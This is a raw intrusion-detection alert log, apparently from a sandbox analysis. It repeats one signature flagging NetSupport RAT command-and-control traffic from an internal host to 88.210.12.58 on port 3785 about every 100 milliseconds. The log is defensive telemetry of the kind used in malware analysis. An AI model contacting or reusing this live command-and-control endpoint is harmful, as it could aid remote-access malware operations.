2024-12-10T08:59:01.023993+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.124725+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.228721+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.328724+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.424985+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.525006+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.628710+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.728041+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.828715+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:01.931051+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.032103+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.133035+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.233024+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.334123+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.435102+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.535007+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.635007+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.735016+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.836060+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:02.936004+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.037029+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.136994+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.238013+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.339011+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.440004+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.544715+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.643365+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.744715+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.844729+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:03.958699+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.480142+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.480142+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.681015+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.782020+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.882005+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:04.984715+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.084719+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.183000+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.284719+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.384010+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.484726+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.585001+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.688631+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.786068+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.887016+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:05.988081+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.089053+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.189045+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.290071+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.389988+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.490015+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.591088+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.691080+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.792029+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.892992+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:06.993014+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.096722+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.195153+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.295993+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.396042+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.497008+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.597996+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.698987+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.798986+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:07.900006+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.000079+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.101047+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.201014+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.302015+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.401985+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.503010+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.604006+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:08.705588+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.268987+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.268987+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.470006+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.571054+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.674892+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.774944+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.874998+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:09.972022+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.073052+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.174121+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.274996+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.375007+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.475999+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.577004+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.677016+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.777995+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.878058+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:10.979018+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.082784+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.179999+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.282944+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.382028+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.483104+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.627697+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.627697+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.945976+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:11.945976+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.148057+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.349006+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.450033+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.551058+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.651042+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.751022+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.853906+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:12.958794+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.059116+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.158795+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.258878+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.358722+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.456994+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.558004+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.658074+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.758857+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.859013+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:13.959029+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.059027+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.160282+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.262059+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.461999+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.461999+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:14.968793+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.167008+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.268729+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.368026+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.469090+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.569090+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.669758+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.772729+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.870903+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:15.971019+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.072007+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.173057+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.273070+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.373100+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.474027+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.575010+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.676005+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.776012+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.876010+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:16.980735+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.078013+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.182741+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.279030+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.379991+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.480223+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.580016+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.682745+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.781008+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.882741+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:17.982998+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.084120+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.184131+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.285021+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.386082+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.486049+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.586008+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.687010+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.788005+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.888075+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:18.990922+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.089016+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.191771+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.290016+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.392729+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.491321+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.595643+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.695046+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.796356+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.897666+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:19.997049+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.098184+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.199108+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.299116+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.400034+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.500049+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.600031+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.701107+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.801013+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:20.903173+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.002008+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.102811+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.202807+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.303037+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.404026+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.506787+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.605256+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.708741+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.808733+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:21.907012+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.008054+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.108003+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.208063+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.309055+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.410055+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
